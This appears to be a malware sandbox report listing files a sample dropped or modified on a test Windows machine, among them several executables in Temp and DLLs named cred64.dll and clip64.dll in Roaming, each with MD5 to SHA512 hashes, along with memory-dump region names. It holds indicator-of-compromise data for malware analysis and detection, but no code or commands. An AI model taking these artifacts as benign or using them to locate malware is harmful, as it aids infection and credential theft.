SHA256 6cc6811c39e7bc94f3cab5599006040a0a55b5d6be3d2d0353582716bda9f7a9
SHA512 14902d086f2379b0d6324032fe6146ca1f242123ccccea6136582a577e13bd1701e88f2e897723e67bcbf91add3be15ee215dee6955d36d85505753675256cb2

C:\Users\Admin\AppData\Local\Temp\AF69.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\AF69.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/316-363-0x0000000000110000-0x000000000011A000-memory.dmp

memory/316-364-0x00007FF9D8C60000-0x00007FF9D9721000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\AC1A.tmp\AC2A.tmp\AC2B.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/3480-378-0x0000000073A70000-0x0000000074220000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

MD5 fbeb83d8ac9e07a6391b6ff726915e09
SHA1 30df12929f8c3ae5ed3e2da02a29beaf29593293
SHA256 2bdb9a5f5624a3af485897f23de2d5e7c37ceee27fc951cf6c0322a243ce4bbe
SHA512 563d2dffea3e3f06ad92e894cb1244d0d2b818a43dd537dec50b47542842bf160c522bf6d4317f90968e94cbbf3a83948a7307d08a5d0b4a0759e1f01c1522c6

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

MD5 fbeb83d8ac9e07a6391b6ff726915e09
SHA1 30df12929f8c3ae5ed3e2da02a29beaf29593293
SHA256 2bdb9a5f5624a3af485897f23de2d5e7c37ceee27fc951cf6c0322a243ce4bbe
SHA512 563d2dffea3e3f06ad92e894cb1244d0d2b818a43dd537dec50b47542842bf160c522bf6d4317f90968e94cbbf3a83948a7307d08a5d0b4a0759e1f01c1522c6

memory/1728-383-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3480-381-0x0000000007590000-0x00000000075A0000-memory.dmp

memory/4704-386-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/4704-387-0x0000000000200000-0x000000000023E000-memory.dmp

memory/4704-388-0x0000000007190000-0x00000000071A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d5af55f794f9a10c5943d2f80dde5c5
SHA1 5252adf87d6bd769f2c39b9e8eba77b087a0160d
SHA256 43e50edafcaaeae9fcd4dce5b99bf14fe79dae1401019443f31aa9ff81347764
SHA512 2e2e09a00db732ff934da1e6ab8617fb3c8de482f9667a2c987435d0a5d67550b4bfd66e8b4475012b60908c24e39dff58e2f2ffa55f13ffc55caae1be630c71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 589f2c74d6ce9bceaadb06c6e92fc856
SHA1 e80bdd360d6f695ab685c7d53bc2e392633ebae6
SHA256 3c02c9db771e27db42ec03cc6d82481f0b2809bed6c032e021a866bc6f26b7af
SHA512 88df419a9d77d627e283b1ab10ffc2eec1a010468d74a3533cba8ea19da78b83f9847f1da32c6f585b163bd3dbe83083867a489eabcc5b4aa3455480c8fd8787

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58c917.TMP

MD5 5034ea19f66f717ee33a12e814eddc63
SHA1 323093aec0b62a7513ac7e319a76b5c43c19d31b
SHA256 654d20451be44b77fe9b10b54cacf1de80474031650e5b3d7f21c7c2bf232398
SHA512 3754ec1ef79a069fb36113af7f694560e50ecc8c71030dbffe75ec6c7ef2f682fcda0c53943486c47ac2596b006499d08c8ace887a99d5ad2cf9653568e4e2d6

memory/316-490-0x00007FF9D8C60000-0x00007FF9D9721000-memory.dmp

memory/3480-501-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/316-503-0x00007FF9D8C60000-0x00007FF9D9721000-memory.dmp

memory/3480-504-0x0000000007590000-0x00000000075A0000-memory.dmp

memory/4704-505-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/4704-506-0x0000000007190000-0x00000000071A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 821258b8d22ae7d85fd0504277352964
SHA1 1501d1b6c5b24a64dd4fb7c059b7019850edc73a
SHA256 3887e37a175655b2213f1c8b1933c8f3743547273df7ad624be3ca4dd9609475
SHA512 36bd189de2e558e36d585b1fadd1ff230712c7d402832cfdaf690c2055b81bf53c6706cf15984c3afb4f763fe12a8cd4d1f8261a8a43172b9d7124ae41188391

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2cc59bc8ac8b05cbfc43d6a3b1625f88
SHA1 31120abe0ca094880a66dd6f003d53ca3bbdfe0e
SHA256 d00dc8a363def313f6c4192be4f2711dd3823a39b919b690bbd583499e47a712
SHA512 1b58fd226788ba444a525ee3aa49f7f1ddbbce496f797eb75c398aa6234a78cd1ebf1695dd3293cafe1033c90006a363d9595b057e22fe774299e59d84b77f85

memory/6084-536-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/6084-537-0x0000000000B30000-0x0000000001A5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

memory/1804-559-0x0000000073A70000-0x0000000074220000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1804-565-0x00000000005A0000-0x0000000000AB6000-memory.dmp

memory/6084-568-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/1804-571-0x00000000053D0000-0x00000000053E0000-memory.dmp

memory/1804-572-0x0000000005620000-0x00000000056BC000-memory.dmp

memory/1804-573-0x0000000005360000-0x0000000005361000-memory.dmp

memory/5356-575-0x0000000000400000-0x000000000046F000-memory.dmp

memory/1244-578-0x00000000023C0000-0x00000000024C0000-memory.dmp

memory/5452-580-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5356-581-0x00000000020C0000-0x000000000211A000-memory.dmp

memory/1244-579-0x0000000002310000-0x0000000002319000-memory.dmp

memory/5452-584-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5092-589-0x0000000004190000-0x0000000004598000-memory.dmp

memory/5092-590-0x00000000046A0000-0x0000000004F8B000-memory.dmp

memory/5356-591-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/5512-592-0x0000000000F30000-0x0000000000F4E000-memory.dmp

memory/1860-594-0x00000000001D0000-0x00000000001EE000-memory.dmp

memory/5092-593-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1860-595-0x0000000000400000-0x0000000000431000-memory.dmp

memory/1804-598-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/5512-600-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/1860-601-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/5356-602-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5512-603-0x0000000005870000-0x0000000005880000-memory.dmp

memory/5452-605-0x0000000000400000-0x0000000000409000-memory.dmp

memory/676-604-0x00000000023C0000-0x00000000023D6000-memory.dmp

memory/1860-609-0x00000000049D0000-0x00000000049E0000-memory.dmp

memory/5092-614-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5320-615-0x00007FF706C00000-0x00007FF7071A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2851a70ca19b16778e94b225dcc27904
SHA1 cea1968ef75b931ddd6e8af9256dcae12ff74870
SHA256 707f9ba4d77ef904b4343d5363dc2587dfe7bd9800c21006aad40d1e986647a0
SHA512 bd52bc9d20c6d23a889f2625de66299a0ed00052f29ec26a90e05dd24768802338f63205301b8305ca792c20bcd8c242c24ffd9d7580d7cf248214ec3a77fc30

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 61584b4ce26636c20cce4748f0b3ebe8
SHA1 4c92db3122013ee98b9ef74d80d4bf898594a65c
SHA256 cd6501470054de747bec19b698ff478be89abc245a7764844e6a926f53e0bd2a
SHA512 d4c379c4d772f7cc7860c03c3356ee3668fa7c636bbe455926908aebfb133b108c31df5579211b36a7c90bf47510d9c92e855c2956a8150a053c99cd1c868faf

memory/5092-638-0x0000000004190000-0x0000000004598000-memory.dmp

memory/5092-639-0x00000000046A0000-0x0000000004F8B000-memory.dmp

memory/5512-640-0x0000000073A70000-0x0000000074220000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ef766753-938b-4602-a2a8-12855bc1709d.tmp

MD5 f119c59ab5b93e73ae39b69f5b8c8658
SHA1 b1cbdd2fdeef5b7bb03e1e3ae7241fb27441acba
SHA256 2dfa1c3dfb5ab557db79d5b97fa87a7f69a59ec6d1046633b233154d2a5bc91c
SHA512 6f1f285c4844a3640f3b221c1edc196cd4bb8c9868fae1d95c5531ca9be02fe148be13c0aa4064f793ae03f8cf6aa73941d84a886708ab3b2adb26f4d9367e43

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 98016b359d789dbc7817993933766999
SHA1 616fc323bc29b87c281235b738a045c75e32ea6c
SHA256 1373b412cc42cd0ed852d0b5f78b8242df547f6854107798d2427da790afba88
SHA512 96cdf65839633cdbb7aca2d99fce315f881727f94240333a042b0d79a4fe7125ef70ac9a41b36fd89557ea95424a30745a6b5f5f4f1fed54036f3ec8dbb7de47

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4iwu044s.wwj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\tmp70E8.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp710D.tmp

MD5 afa13f3defcd7a3454d106cf6abbf911
SHA1 c5bb2e376d265d252edbcea4252580c7f44ee741
SHA256 707fff65d2f00566f96afd5b2a0e1c0460367c4bc008e55b60739f046f46f2f0
SHA512 570a13afeaa7452cb43528aff19c09bbc528c6b29f065e847e966bfd2cd8dc3cdc0637935e6f9ebfdde8019e5135ab01a3a18667e0ed8623ef8b3366492a6203

C:\Users\Admin\AppData\Local\Temp\tmp7148.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp715D.tmp

MD5 89e12a4710470299e05679908b2b1f7a
SHA1 85b08579e6cf8518b085ea7709bd67ae6b3e0914
SHA256 1b89b37b7f154f7c1c9adba1f8f660fdcb1b0f4a4812207b450fbe5c251e6542
SHA512 670609ca82862c03208bc00b927e5f2ca0847572001a5cb6cdb9bb046abbcc0476cdf3b7df83c7e5f592301c4ca85e47ef3a7d32fe45552981d21d9a110794d3

C:\Users\Admin\AppData\Local\Temp\tmp716F.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp719A.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4